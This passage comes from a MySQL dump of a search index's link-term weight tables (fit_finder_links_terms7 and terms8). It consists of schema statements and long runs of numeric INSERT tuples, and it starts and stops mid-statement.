1.07331),(110,29239,0.7),(110,29240,1.09669),(110,29241,1.16669),(110,29242,0.32669),(110,29243,1.09669),(110,29244,1.16669),(110,29245,0.60669),(110,29246,1.09669),(110,29247,1.28331),(110,29248,0.02919),(113,29248,0.02919),(116,29248,0.02919),(120,29248,0.02919),(110,29249,0.91),(110,29250,1.12),(110,29251,0.46669),(110,29252,1.09669),(110,29253,1.35331),(110,29254,0.65331),(110,29255,1.21331),(110,29256,1.28331),(112,29257,0.32669),(110,29257,0.65338),(110,29258,1.00331),(110,29259,1.05),(110,29260,0.93331),(110,29261,1.12),(110,29262,0.84),(110,29263,0.88669),(110,29264,1.05),(110,29265,1.00331),(110,29266,1.07331),(110,29267,1.09669),(110,29268,1.16669),(110,29269,0.28),(110,29270,0.91),(110,29271,1.00331),(110,29272,0.02331),(110,29273,0.98),(110,29274,1.07331),(110,29275,0.14),(110,29276,0.88669),(110,29277,1.02669),(110,29278,0.28),(128,29278,0.28),(110,29279,0.95669),(110,29280,1.05),(110,29281,2.58993),(110,29282,1.12),(110,29283,1.86662),(110,29284,0.88669),(110,29285,0.95669),(110,29286,0.93331),(110,29287,1.12),(110,29288,0.93331),(110,29289,0.84),(110,29290,1.00331),(110,29291,0.91),(110,29292,0.98),(110,29293,1.23669),(110,29294,1.05),(110,29295,1.30669),(110,29296,1.09669),(110,29297,1.16669),(110,29298,0.91),(110,29299,1.12),(110,29300,1.02669),(110,29301,1.07331),(110,29302,1.12),(110,29303,1.02669),(110,29304,1.26),(111,31122,0.14),(111,31123,0.86331),(111,31124,1.05),(111,31125,0.14),(114,31125,0.14),(111,31126,0.93331),(111,31127,1.09669),(111,31128,0.88669),(111,31129,0.95669),(111,31130,1.02669),(111,31131,1.21331),(111,31132,0.42),(111,31133,0.98),(111,31134,1.23669),(111,31135,0.18662),(111,31136,0.93331),(111,31137,1.00331),(111,31138,0.91),(111,31139,1.07331),(111,31140,0.56),(111,31141,0.95669),(111,31142,1.23669),(111,31143,0.93331),(111,31144,1.12),(111,31145,0.14),(111,31146,0.93331),(111,31147,1.09669),(111,31148,0.84),(111,31149,0.88669),(111,31150,1.02669),(111,31151,0.95669),(111,31152,1.14331),(111,31153,0.91),(111,31154,1.09669),(111,31155,0.93331),(111,31156,1.05),(111,31157,0.91),(111,31158,1.00331),(111,31159,0.88669),(111,31160,0.98),(111,31161,0.46662),(111,31162,2.33338),(111,31163,1.26),(111,31164,1.21331),(111,31165,0.23331),(111,31166,1.02669),(111,31167,1.12),(111,31168,0.14),(111,31169,0.93331),(111,31170,1.14331),(111,31171,0.28),(111,31172,0.98),(111,31173,1.12),(111,31174,0.88669),(111,31175,0.95669),(111,31176,0.84),(114,31176,0.84),(111,31177,1.05),(114,31177,1.05),(111,31178,0.84),(111,31179,0.91),(111,31180,0.84),(111,31181,0.93331),(111,31182,0.93331),(111,31183,1.02669),(111,31184,0.18669),(111,31185,0.93331),(111,31186,1.00331),(111,31187,0.37338),(111,31188,0.88669),(111,31189,1.05),(111,31190,0.88669),(111,31191,1.02669),(111,31192,0.28),(111,31193,1.12),(111,31194,1.21331),(111,31195,0.28),(114,31195,0.56),(111,31196,1.05),(111,31197,1.19),(111,31198,0.56),(111,31199,1.12),(111,31200,1.26),(111,31201,1.00331),(111,31202,1.05),(111,31203,0.95669),(111,31204,1.02669),(111,31205,0.93331),(111,31206,1.12),(111,31207,0.95669),(111,31208,1.16669),(111,31209,1.12),(111,31210,1.19),(111,31211,0.37331),(111,31212,1.02669),(111,31213,1.12),(111,31514,0.37338),(111,31515,1.68),(111,31516,0.93331),(111,31517,0.91),(111,31518,0.65338),(111,31519,1.05),(111,31520,1.21331),(111,31521,1.00331),(111,31522,1.07331),(111,31523,0.69993),(111,31524,0.98),(111,31525,1.09669),(111,31526,1.00331),(111,31527,1.23669),(111,31528,0.93331),(111,31529,1.05),(111,31530,0.32669),(111,31531,1.07331),(111,31532,1.30669),(111,31533,0.42),(111,31534,1.09669),(111,31535,1.14331),(111,31536,0.46662),(111,31537,0.86331),(111,31538,0.91),(111,31539,0.88669),(111,31540,0.95669),(111,31541,0.32669),(111,31542,0.98),(111,31543,1.19),(111,31544,0.32669),(111,31545,0.91),(111,31546,1.30669),(111,31547,0.28),(111,31548,1.09669),(111,31549,1.28331),(114,31550,0.28),(111,31550,0.56),(111,31551,1.82),(111,31552,1.09669),(111,31553,1.16669),(111,31554,0.56),(111,31555,1.91338),(111,31556,1.19),(111,31557,1.05),(111,31558,1.07331),(111,31559,1.12),(111,31560,1.12),(111,31561,1.21331),(111,31562,1.96),(111,31563,0.91),(111,31564,1.12),(111,31565,1.05),(111,31566,1.21331),(111,31567,2.00662),(111,31568,1.21331),(111,31569,1.07331),(111,31570,0.93331),(111,31571,1.14331),(111,31572,1.05),(111,31573,1.21331),(111,31574,1.07331),(111,31575,1.16669),(111,31576,0.28),(111,31577,0.91),(111,31578,1.05),(111,31995,0.93331),(111,31996,1.07331),(111,31997,0.42),(111,31998,0.98),(111,31999,1.12),(111,32000,0.28),(111,32001,0.91),(111,32002,1.05),(125,32003,0.09331),(114,32003,0.18662),(121,32003,0.18662),(111,32003,1.11972),(111,32004,0.98),(111,32005,1.09669),(111,32006,0.91),(111,32007,1.09669),(111,32008,0.91),(111,32009,1.00331),(111,32010,0.93331),(111,32011,1.07331),(111,32012,0.95669),(111,32013,1.16669),(111,32014,0.95669),(111,32015,1.09669),(111,32016,1.02669),(111,32017,1.19),(111,32018,0.91),(111,32019,1.14331),(111,32020,0.98),(111,32021,1.19),(111,32022,0.98),(111,32023,1.05),(111,32024,0.98),(111,32025,1.05),(111,32026,0.91),(111,32027,1.12),(111,32028,0.14),(111,32029,0.95669),(111,32030,1.16669),(111,32031,0.98),(111,32032,1.05),(111,32033,0.91),(111,32034,1.09669),(111,32035,0.98),(111,32036,1.21331),(111,32037,1.02669),(111,32038,1.26),(111,32039,1.05),(111,32040,0.93331),(111,32041,1.02669),(111,32042,0.88669),(111,32043,0.95669),(111,32044,0.91),(111,32045,0.98),(111,32046,1.00331),(111,32047,1.33),(111,32048,0.98),(111,32049,1.07331),(111,32050,1.19),(111,32051,1.4),(111,32052,1.19),(111,32053,1.05),(111,32054,1.33),(111,32055,0.91),(111,32056,0.98),(111,32057,0.28),(111,32058,0.93331),(111,32059,1.09669),(111,32060,0.86331),(111,32061,1.09669),(111,32062,0.32669),(111,32063,1.07331),(111,32064,1.35331),(111,32065,0.46669),(111,32066,1.00331),(111,32067,1.21331),(112,32960,0.32669),(112,32961,1.09669),(112,32962,1.23669),(112,32963,0.28),(112,32964,0.84),(112,32965,0.93331),(112,32966,0.91),(112,32967,1.05),(112,32968,0.95669),(112,32969,1.02669),(112,32970,0.86331),(112,32971,1.00331),(112,32972,0.91),(112,32973,0.98),(112,32974,0.28),(120,32974,0.28),(125,32974,0.28),(112,32975,0.95669),(112,32976,1.09669),(112,32977,0.51331),(112,32978,1.07331),(112,32979,1.16669),(112,32980,0.32669),(112,32981,0.98),(112,32982,1.05),(112,32983,0.95669),(112,32984,0.88669),(112,32985,0.93331),(112,32986,0.98),(112,32987,1.09669),(112,32988,0.86331),(112,32989,0.95669),(112,32990,1.00331),(112,32991,0.32669),(112,32992,1.00331),(112,32993,1.12),(112,33097,1.23669),(112,33385,0.91),(112,33386,1.02669),(112,33387,0.42),(112,33388,1.05),(112,33389,1.21331),(112,33390,0.28),(112,33391,0.98),(112,33392,1.09669),(118,33393,1.00331),(112,33393,2.00662),(112,33394,2.14662),(112,33395,0.98),(112,33396,1.09669),(112,33397,0.81669),(112,33398,0.93331),(112,33399,0.88669),(112,33400,0.93331),(112,33401,1.07331),(112,33402,1.14331),(112,33403,0.84),(112,33404,1.02669),(112,33405,0.98),(112,33406,1.16669),(113,34332,0.32669),(113,34333,0.95669),(113,34334,1.21331),(113,34335,0.56),(113,34336,0.98),(113,34337,1.09669),(113,34338,1.00331),(113,34339,1.09669),(113,34340,0.42),(113,34341,1.00331),(113,34342,1.09669),(113,34343,0.88669),(113,34344,1.05),(113,34345,0.95669),(113,34346,1.12),(113,34347,0.93331),(113,34348,1.12),(113,34349,0.88669),(113,34350,1.00331),(113,34351,1.05),(113,34352,1.21331),(113,34353,0.86331),(113,34354,1.00331),(113,34355,0.93331),(113,34356,1.02669),(113,34357,0.88669),(113,34358,1.02669),(113,34359,0.88669),(113,34360,1.02669),(113,34361,0.84),(113,34362,1.05),(113,34565,1.05),(113,34566,1.12),(113,34567,0.98),(113,34568,1.09669),(113,35062,0.93331),(113,35063,1.07331),(113,35064,0.02919),(117,35064,0.02919),(120,35064,0.02919),(126,35064,0.02919),(113,35065,0.88669),(113,35066,1.12),(113,35067,0.98),(113,35068,0.23331),(113,35069,0.93331),(113,35070,1.07331),(113,35071,0.86331),(113,35072,0.93331),(113,35073,0.84),(113,35074,0.98),(113,35075,0.95669),(113,35076,0.86331),(113,35077,1.05),(113,35078,0.23331),(113,35079,0.95669),(113,35080,1.12),(113,35081,0.93331),(113,35082,1.00331),(114,35614,1.02669),(114,35615,1.19),(114,35616,0.46669),(114,35617,0.98),(114,35618,1.09669),(114,35619,0.46669),(114,35620,1.00331),(114,35621,1.14331),(114,35622,0.23331),(114,35623,1.02669),(114,35624,1.16669),(114,35625,0.23331),(121,35625,0.46662),(114,35626,1.02669),(114,35627,1.14331),(114,35628,0.88669),(114,35629,1.05),(114,35630,0.28),(114,35631,0.95669),(114,35632,1.05),(114,35633,1.02669),(114,35634,1.12),(114,35635,1.05),(114,35636,1.14331),(114,35637,0.98),(114,35638,1.21331),(114,35639,0.04081),(114,35640,1.07331),(114,35641,1.14331),(114,35727,0.93331),(114,35728,1.00331),(114,35729,0.28),(114,35730,0.93331),(114,35731,1.00331),(114,35732,1.05),(114,35733,1.26),(114,35902,0.91),(114,35903,1.21331),(114,35904,0.86331),(114,35905,1.00331),(114,35906,2.73),(114,35907,1.02669),(114,35908,2.19338),(114,35909,0.93331),(114,35910,0.98),(114,35911,0.98),(114,35912,1.16669),(114,35913,0.18669),(114,35914,0.86331),(114,35915,1.05),(114,35916,0.46669),(114,35917,1.02669),(114,35918,1.16669),(116,37353,0.88669),(116,37354,1.00331),(116,37355,0.42),(116,37356,1.00331),(116,37357,1.07331),(116,37441,0.51331),(116,37442,1.14331),(116,37443,1.35331),(116,37592,0.91),(116,37593,1.19),(116,37594,0.46669),(116,37595,1.00331),(116,37596,1.12),(116,37597,0.86331),(116,37598,1.12),(117,38453,0.51331),(117,38454,1.00331),(117,38455,1.14331),(117,38456,0.18669),(123,38456,0.18669),(117,38457,0.88669),(117,38458,1.07331),(117,38459,0.98),(117,38460,1.07331),(117,38461,0.98),(117,38462,1.26),(117,38463,1.00331),(117,38464,0.86331),(117,38465,1.02669),(117,38466,0.88669),(117,38467,1.00331),(117,38468,0.91),(117,38469,1.00331),(117,38470,0.98),(117,38471,1.16669),(117,38472,1.02669),(117,38473,1.14331),(117,38474,1.05),(117,38475,1.09669),(117,38476,0.91),(117,38477,0.28),(117,38478,0.95669),(117,38479,1.00331),(117,38480,0.86331),(117,38481,0.98),(117,38482,0.84),(117,38483,1.12),(117,38484,0.86331),(117,38485,0.95669),(117,38628,1.02669),(117,38629,1.09669),(117,38630,0.23331),(117,38631,0.86331),(117,38632,0.98),(117,38969,0.79331),(117,38970,0.93331),(117,38971,0.32669),(117,38972,0.98),(117,38973,1.05),(117,38974,0.51331),(117,38975,1.12),(117,38976,1.28331),(117,38977,0.51331),(117,38978,1.05),(117,38979,1.26),(117,38980,0.86331),(117,38981,1.00331),(117,38982,0.81669),(117,38983,0.91),(117,38984,0.88669),(117,38985,0.98),(117,38986,0.23331),(118,38986,0.23331),(117,38987,0.93331),(117,38988,1.00331),(117,38989,0.95669),(120,38990,0.86331),(123,38990,0.86331),(117,38990,1.72662),(117,38991,0.93331),(117,38992,1.00331),(117,38993,0.86331),(117,38994,1.07331),(118,39495,0.98),(118,39496,1.07331),(118,39497,0.93331),(118,39498,1.00331),(118,39499,1.02669),(118,39500,1.00331),(118,39501,1.12),(118,39502,0.91),(118,39503,1.09669),(118,39504,0.93331),(119,39504,0.93331),(118,39505,1.00331),(119,39505,1.00331),(118,39506,0.88669),(118,39507,1.02669),(118,39508,0.88669),(118,39509,1.00331),(118,39569,1.09669),(118,39570,1.21331),(118,39571,1.05),(118,39572,1.14331),(118,39725,1.19),(118,39726,0.95669),(118,39727,1.14331),(118,39728,0.23331),(118,39729,1.00331),(118,39730,1.19),(119,40548,0.98),(119,40549,1.19),(119,40550,1.00331),(119,40551,0.95669),(119,40552,1.07331),(119,40553,0.81669),(119,40554,0.93331),(119,40555,1.00331),(119,40556,1.19),(119,40557,0.91),(119,40558,1.26),(119,40559,1.05),(119,40560,1.23669),(119,40561,0.86331),(119,40562,1.05),(119,40957,1.00331),(119,40958,0.93331),(119,40959,1.00331),(119,40960,1.05),(120,42256,0.65338),(120,42257,0.93331),(120,42258,1.05),(120,42259,1.16669),(120,42260,1.26),(120,42261,0.42),(120,42262,1.14331),(120,42263,1.33),(120,42264,1.00331),(120,42265,1.14331),(120,42266,0.37331),(120,42267,1.07331),(120,42268,1.21331),(120,42269,0.18669),(120,42270,0.93331),(120,42271,1.14331),(120,42272,0.88669),(120,42273,0.93331),(120,42274,0.91),(120,42275,0.98),(120,42276,0.95669),(120,42277,1.05),(120,42278,1.00331),(120,42279,1.12),(120,42280,0.56007),(120,42281,0.88669),(120,42282,1.00331),(120,42283,0.93331),(120,42284,1.16669),(120,42285,0.93331),(120,42286,1.09669),(120,42287,0.95669),(120,42288,1.02669),(120,42289,0.98),(120,42290,1.19),(120,42291,0.88669),(120,42292,0.95669),(120,42293,0.95669),(120,42294,1.02669),(120,42295,0.91),(120,42296,1.05),(120,42297,0.81669),(120,42298,0.95669),(120,42456,0.18669),(120,42457,0.93331),(120,42458,1.09669),(120,42858,0.81669),(120,42859,0.91),(120,42860,0.91),(120,42861,1.05),(120,42862,0.32669),(120,42863,1.07331),(120,42864,1.23669),(120,42865,0.42),(120,42866,1.07331),(120,42867,1.14331),(120,42868,0.86331),(120,42869,1.02669),(120,42870,1.00331),(120,42871,1.14331),(120,42872,0.86331),(120,42873,0.91),(120,42874,0.86331),(120,42875,0.86331),(120,42876,1.07331),(120,42877,0.98),(121,43290,1.02669),(121,43291,1.33),(121,43292,0.46669),(121,43293,1.00331),(121,43294,1.26),(121,43295,0.51331),(121,43296,1.33),(121,43297,1.4),(121,43298,0.56),(121,43299,1.19),(121,43300,1.26),(121,43301,1.02669),(121,43302,1.14331),(121,43303,0.93331),(121,43304,1.02669),(121,43305,0.51331),(121,43306,1.00331),(121,43307,1.16669),(121,43308,0.46669),(121,43309,0.98),(121,43310,1.14331),(121,43311,0.86331),(121,43312,1.05),(121,43313,1.07331),(121,43359,0.28),(121,43360,1.35331),(121,43361,1.4),(121,43362,0.65331),(121,43363,1.12),(121,43364,1.19),(121,43448,0.84),(121,43449,1.09669),(121,43450,1.00331),(121,43451,1.07331),(121,43452,1.05),(121,43453,1.09669),(121,43454,1.19),(121,43455,0.95669),(121,43456,1.09669),(121,43457,0.84),(121,43458,1.09669),(121,43459,0.84),(121,43460,0.98),(121,43461,0.18669),(121,43462,0.95669),(121,43463,1.14331),(123,45056,0.95669),(123,45057,1.07331),(123,45058,0.88669),(123,45059,1.12),(123,45060,0.37331),(123,45061,1.05),(123,45062,1.16669),(123,45063,0.37331),(123,45064,1.00331),(123,45065,1.12),(123,45066,0.37338),(123,45067,0.91),(123,45068,1.07331),(123,45069,0.98),(123,45070,1.14331),(123,45071,0.23331),(123,45072,0.91),(123,45073,1.00331),(123,45074,0.23331),(123,45075,1.02669),(123,45076,1.16669),(123,45077,0.7),(123,45078,1.35331),(123,45079,1.4),(123,45080,0.7),(123,45081,1.23669),(123,45082,1.30669),(123,45362,0.84),(123,45363,0.98),(123,45364,0.95669),(125,46467,0.18669),(128,47204,1.63338),(125,47871,0.91),(125,47872,1.12),(125,47873,0.98),(125,47874,0.23331),(125,47875,0.98),(125,47876,1.09669),(125,47877,0.91),(125,47878,0.98),(125,47879,1.05),(125,47880,0.91),(125,47881,1.00331),(125,47882,0.81669),(125,47883,0.88669),(125,47884,0.88669),(125,47885,0.95669),(125,47886,0.37331),(125,47887,1.16669),(125,47888,1.26),(125,47976,0.09331),(125,47977,0.91),(125,47978,0.98),(125,47979,0.23331),(125,47980,0.91),(125,47981,0.98),(125,48161,0.84),(125,48162,0.88669),(125,48163,0.51331),(125,48164,1.05),(125,48165,1.16669),(125,48166,0.88669),(125,48167,1.05),(125,48168,0.86331),(125,48169,0.93331),(125,48170,0.18669),(125,48171,0.93331),(125,48172,1.02669),(125,48173,0.95669),(125,48174,1.02669),(126,48858,0.88669),(126,48859,1.00331),(126,48860,0.37338),(126,48861,1.02669),(126,48862,1.09669),(126,48863,1.00331),(126,48864,1.09669),(126,48865,0.93331),(126,48866,1.05),(126,48867,0.23331),(126,48868,1.00331),(126,48869,1.09669),(126,48870,0.95669),(126,48871,0.98),(126,48872,1.14331),(126,48943,0.93338),(126,48944,1.12),(126,48945,1.21331),(126,48946,1.09669),(126,48947,1.30669),(126,48948,0.32669),(134,48948,0.32669),(126,48949,0.98),(126,48950,1.14331),(126,49213,0.88669),(126,49214,0.93331),(126,49215,0.37331),(126,49216,1.02669),(126,49217,1.12),(128,51545,0.91),(128,51546,1.05),(128,51547,1.02669),(128,51548,1.16669),(128,51549,0.88669),(128,51550,1.02669),(128,51551,0.98),(128,51552,0.98),(128,51553,1.07331),(128,51554,0.84),(128,51555,0.93331),(128,51556,1.02669),(128,51557,1.19),(128,51558,2.58993),(128,51559,0.93331),(128,51560,0.93331),(128,51561,1.00331),(128,51562,0.88669),(128,51563,1.02669),(128,51836,0.46662),(128,51837,0.88669),(128,51838,1.02669),(128,51839,0.91),(128,51840,1.02669),(128,51841,0.91),(128,51842,0.91),(128,51843,0.98),(128,51844,1.09669),(128,51845,0.84),(128,51846,0.95669),(128,51847,0.93331),(128,51848,1.09669),(128,51849,0.91),(128,51850,1.12),(134,52688,0.91),(134,52689,1.19),(134,52706,1.07331),(134,52707,1.26),(134,52708,1.58),(134,52709,2.00662),(134,52710,2.42662),(134,52711,2.52),(134,52712,1.05),(134,52713,1.00331),(134,52714,0.93331),(134,52715,0.91),(134,52716,1.12),(134,52717,0.93331),(134,52718,1.05),(134,52752,0.95669),(134,52753,0.18669),(134,52754,0.86331),(134,52755,0.95669); /*!40000 ALTER TABLE `fit_finder_links_terms7` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_finder_links_terms8` -- DROP TABLE IF EXISTS `fit_finder_links_terms8`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_finder_links_terms8` ( `link_id` int(10) unsigned NOT NULL, `term_id` int(10) unsigned NOT NULL, `weight` float unsigned NOT NULL, PRIMARY KEY (`link_id`,`term_id`), KEY `idx_term_weight` (`term_id`,`weight`), KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_finder_links_terms8` -- LOCK TABLES `fit_finder_links_terms8` WRITE; /*!40000 ALTER TABLE `fit_finder_links_terms8` DISABLE KEYS */; INSERT INTO `fit_finder_links_terms8` VALUES (2,30,0.6666),(3,30,0.6666),(5,30,0.6666),(9,30,0.6666),(20,30,0.6666),(21,30,0.6666),(22,30,0.6666),(23,30,0.6666),(24,30,0.6666),(25,30,0.6666),(40,30,0.6666),(52,30,0.6666),(55,30,0.6666),(58,30,0.6666),(68,30,0.6666),(77,30,0.6666),(103,30,0.6666),(104,30,0.6666),(105,30,0.6666),(106,30,0.6666),(107,30,0.6666),(109,30,0.6666),(110,30,0.6666),(111,30,0.6666),(112,30,0.6666),(113,30,0.6666),(114,30,0.6666),(116,30,0.6666),(117,30,0.6666),(118,30,0.6666),(119,30,0.6666),(120,30,0.6666),(121,30,0.6666),(123,30,0.6666),(125,30,0.6666),(126,30,0.6666),(128,30,0.6666),(129,30,0.6666),(130,30,0.6666),(133,30,0.6666),(134,30,0.6666),(35,30,1.13322),(2,32,0.05661),(118,32,0.12321),(2,33,2.04),(118,33,4.44),(2,34,0.39996),(3,34,0.39996),(35,34,0.39996),(118,34,0.39996),(120,34,0.39996),(23,34,0.6666),(77,34,0.6666),(104,34,0.6666),(105,34,0.6666),(106,34,0.6666),(107,34,0.6666),(111,34,0.6666),(112,34,0.6666),(114,34,0.6666),(103,34,1.83315),(3,95,0.18669),(3,96,1.02669),(3,97,1.14331),(3,98,0.69993),(3,99,0.93331),(3,100,1.05),(3,101,0.93331),(3,102,1.12),(3,103,0.91),(3,104,1.02669),(3,105,0.46662),(3,106,1.09669),(3,107,1.19),(3,108,0.91),(3,109,1.21331),(3,110,0.18669),(3,111,0.98),(3,112,1.07331),(3,145,0.37331),(3,146,1.02669),(3,147,1.16669),(3,148,0.23331),(3,149,0.93331),(3,150,1.09669),(3,151,0.23331),(3,152,0.88669),(3,153,1.02669),(3,157,0.65338),(3,158,1.02669),(3,159,1.14331),(3,160,0.95669),(3,161,1.07331),(3,162,0.09331),(3,163,0.95669),(3,164,1.14331),(3,165,0.42),(3,166,1.02669),(3,167,1.12),(3,168,0.23331),(3,169,0.95669),(3,170,1.05),(3,216,0.74662),(3,217,1.07331),(3,218,1.21331),(3,219,1.05),(3,220,1.12),(3,221,0.37331),(3,222,1.02669),(3,223,1.14331),(3,224,0.42),(3,225,1.12),(3,226,1.26),(3,227,0.32669),(3,228,0.98),(3,229,1.26),(3,230,0.37331),(3,231,1.07331),(3,232,1.23669),(3,233,0.69993),(3,234,0.88669),(3,235,1.09669),(3,236,0.93331),(3,237,1.05),(5,384,1.04004),(40,384,1.04004),(52,384,1.04004),(55,384,1.04004),(58,384,1.04004),(68,384,1.04004),(113,384,1.04004),(116,384,1.04004),(117,384,1.04004),(121,384,1.04004),(123,384,1.04004),(125,384,1.04004),(126,384,1.04004),(129,384,1.04004),(130,384,1.04004),(133,384,1.04004),(5,385,0.37331),(114,385,0.37331),(116,385,0.37331),(106,385,0.74662),(5,386,1.07331),(5,387,1.23669),(5,388,0.42),(5,398,0.28),(5,399,1.00331),(5,400,1.23669),(5,401,0.23331),(5,402,0.91),(5,403,1.12),(5,407,0.51331),(5,408,1.09669),(5,409,1.19),(5,410,0.28),(5,411,1.07331),(35,412,0.37331),(110,412,0.37331),(5,412,1.97321),(35,432,0.18669),(103,432,0.18669),(105,432,0.18669),(134,432,0.18669),(120,432,0.37338),(129,432,0.98679),(110,432,1.12014),(9,469,0.37331),(9,470,0.98),(9,471,1.19),(9,472,0.0175),(68,472,0.0175),(114,472,0.0175),(133,472,0.0175),(35,472,0.035),(40,472,0.035),(107,472,0.0525),(116,472,0.0525),(118,472,0.0525),(119,472,0.0525),(105,472,0.07),(117,472,0.07),(123,472,0.07),(106,472,0.0875),(111,472,0.0875),(126,472,0.0875),(125,472,0.105),(103,472,0.1225),(104,472,0.1225),(112,472,0.1575),(120,472,0.1575),(128,472,0.35),(110,472,0.385),(113,472,0.665),(9,473,0.98),(9,474,1.05),(133,484,0.01169),(9,484,0.02338),(35,484,0.02338),(40,484,0.02338),(68,484,0.02338),(104,484,0.02338),(116,484,0.02338),(125,484,0.02338),(126,484,0.02338),(128,484,0.02338),(118,484,0.03507),(112,484,0.04676),(107,484,0.05845),(119,484,0.05845),(120,484,0.07014),(105,484,0.08183),(113,484,0.09352),(123,484,0.09352),(117,484,0.15197),(110,484,0.18704),(103,484,0.19873),(106,484,0.19873),(9,485,0.79331),(35,485,0.79331),(104,485,0.79331),(110,485,0.79331),(117,485,0.79331),(118,485,0.79331),(40,485,1.58662),(103,485,1.58662),(119,485,1.58662),(106,485,4.75986),(9,486,1.00331),(9,487,0.86331),(9,488,1.02669),(35,489,0.01169),(68,489,0.01169),(105,489,0.01169),(118,489,0.01169),(123,489,0.01169),(134,489,0.01169),(116,489,0.02338),(126,489,0.02338),(110,489,0.03507),(119,489,0.03507),(9,489,0.04676),(104,489,0.05845),(113,489,0.05845),(125,489,0.05845),(112,489,0.07014),(106,489,0.08183),(120,489,0.08183),(103,489,0.10521),(107,489,0.14028),(117,489,0.19873),(9,490,0.84),(106,490,0.84),(119,490,0.84),(9,491,0.95669),(9,492,0.91),(9,493,0.98),(9,494,0.81669),(68,494,0.81669),(103,494,0.81669),(9,495,0.86331),(9,496,0.98),(9,508,0.18669),(9,509,0.86331),(9,510,1.02669),(9,534,0.37331),(125,534,0.37331),(9,535,1.07331),(9,536,1.16669),(9,537,0.37331),(9,538,1.09669),(9,539,1.28331),(113,1614,0.14),(128,1614,0.42),(125,1614,0.74),(35,1614,0.84),(133,1614,1.02),(40,1631,0.02338),(134,1631,0.02338),(109,1631,0.03507),(118,1631,0.04676),(125,1631,0.04676),(112,1631,0.05845),(128,1631,0.05845),(133,1631,0.05845),(117,1631,0.08183),(106,1631,0.09352),(116,1631,0.09352),(121,1631,0.09352),(103,1631,0.10521),(113,1631,0.10521),(114,1631,0.10521),(104,1631,0.1169),(123,1631,0.1169),(35,1631,0.12859),(119,1631,0.12859),(120,1631,0.15197),(111,1631,0.16366),(126,1631,0.17535),(105,1631,0.19873),(107,1631,0.28056),(110,1631,0.43253),(35,1634,0.37331),(117,1634,0.37331),(35,1695,0.37331),(118,1695,0.37331),(110,1695,1.86655),(35,1698,0.42),(111,1698,0.42),(119,1698,0.42),(125,1698,0.42),(134,1698,0.42),(22,3043,0.6666),(22,3044,2.8),(23,3049,0.48),(35,3065,0.23331),(25,3065,0.79992),(35,9361,0.37331),(35,9362,1.02669),(35,9363,1.26),(35,9364,0.18669),(52,9364,0.18669),(68,9364,0.18669),(110,9364,0.18669),(112,9364,0.18669),(120,9364,0.18669),(35,9365,0.86331),(35,9366,0.95669),(35,9367,0.32669),(35,9368,0.93331),(35,9369,1.02669),(35,9370,0.46669),(35,9371,1.16669),(35,9372,1.4),(35,9373,0.42),(120,9373,0.42),(40,9373,0.84),(35,9374,1.02669),(35,9375,1.14331),(35,9376,0.98),(35,9377,1.12),(35,9378,1.21338),(55,9378,3.20679),(35,9379,1.09669),(35,9380,1.23669),(35,9381,1.19),(35,9382,1.35331),(35,9383,0.69993),(35,9384,0.91),(35,9385,1.05),(35,9386,1.05),(35,9387,1.21331),(35,9388,0.95669),(35,9389,1.12),(40,9431,0.42),(120,9431,0.84),(35,9431,1.26),(134,9431,1.26),(35,9432,1.16669),(35,9433,1.4),(35,9434,1.07331),(35,9435,1.23669),(35,9436,1.12),(134,9436,3.36),(35,9437,1.33),(110,9438,0.23331),(116,9438,0.23331),(126,9438,0.23331),(106,9438,0.46662),(112,9438,0.46662),(35,9438,0.69993),(104,9438,0.93324),(35,9439,2.19338),(35,9440,2.70662),(35,9441,1.02669),(35,9442,1.14331),(35,9443,0.84),(35,9444,0.88669),(133,9445,0.84),(35,9445,1.68),(35,9446,0.88669),(35,9447,1.02669),(35,9448,0.91),(35,9449,1.00331),(35,9450,0.84),(35,9451,1.02669),(35,9452,0.86331),(35,9453,0.95669),(35,9454,0.14),(120,9454,0.14),(35,9455,0.98),(35,9456,1.07331),(35,9457,0.32669),(120,9457,0.32669),(35,9458,0.93331),(120,9458,0.93331),(35,9459,1.02669),(35,9460,0.42),(103,9460,0.42),(110,9460,0.42),(112,9460,0.42),(119,9460,0.42),(123,9460,0.42),(133,9460,0.42),(35,9461,1.14331),(35,9462,1.4),(35,9463,1.02669),(35,9464,1.12),(35,9465,0.93331),(35,9466,1.07331),(35,9467,0.23331),(103,9467,0.23331),(110,9467,0.23331),(35,9468,0.95669),(35,9469,1.07331),(35,9470,1.21338),(35,9471,1.28331),(35,9472,1.37669),(35,9473,1.07331),(35,9474,1.16669),(35,9475,0.37338),(116,9475,0.98679),(35,9476,2.1),(116,9476,5.55),(35,9477,1.28331),(35,9478,1.26),(35,9479,0.28),(120,9479,0.56),(35,9480,1.09669),(35,9481,1.19),(35,9507,0.86331),(35,9508,1.00331),(35,9509,0.86331),(35,9510,1.07331),(35,9511,1.00331),(35,9512,1.23669),(35,9513,0.86331),(35,9514,0.95669),(35,9515,0.86331),(35,9516,0.95669),(35,9517,0.88669),(110,9517,1.77338),(35,9518,0.95669),(110,9518,1.91338),(35,9519,0.88669),(35,9520,1.05),(106,9521,0.84),(112,9521,0.84),(117,9521,0.84),(121,9521,0.84),(123,9521,0.84),(134,9521,0.84),(103,9521,1.68),(113,9521,1.68),(116,9521,1.68),(118,9521,1.68),(125,9521,1.68),(104,9521,2.52),(119,9521,2.52),(120,9521,2.52),(126,9521,2.52),(35,9521,3.36),(105,9521,3.36),(133,9521,3.36),(110,9521,7.56),(35,9522,1.86662),(35,9523,2.00662),(35,9524,2.14662),(35,9525,1.16669),(35,9526,1.35331),(35,9527,1.09669),(35,9528,1.33),(125,9529,0.51331),(123,9529,1.02662),(35,9529,2.56655),(55,9529,2.71321),(110,9529,3.07986),(35,9530,1.05),(35,9531,1.16669),(35,9532,2.56662),(55,9532,6.78321),(35,9533,1.37669),(35,9534,1.4),(35,9535,2.42662),(35,9536,2.61338),(35,9537,0.51331),(52,9537,0.51331),(55,9537,0.51331),(35,9538,1.14331),(35,9539,1.23669),(35,9540,0.37331),(105,9540,0.37331),(110,9540,0.37331),(103,9540,0.74662),(120,9540,0.74662),(35,9541,1.05),(35,9542,1.23669),(134,9543,0.46669),(35,9543,1.86676),(40,9543,2.46679),(35,9544,1.23669),(35,9545,1.4),(35,9546,1.00331),(35,9547,1.12),(35,9548,1.19),(35,9549,1.4),(35,9550,1.16669),(35,9551,1.23669),(35,9552,1.00331),(35,9553,0.93331),(35,9554,1.12),(35,9555,0.84),(103,9555,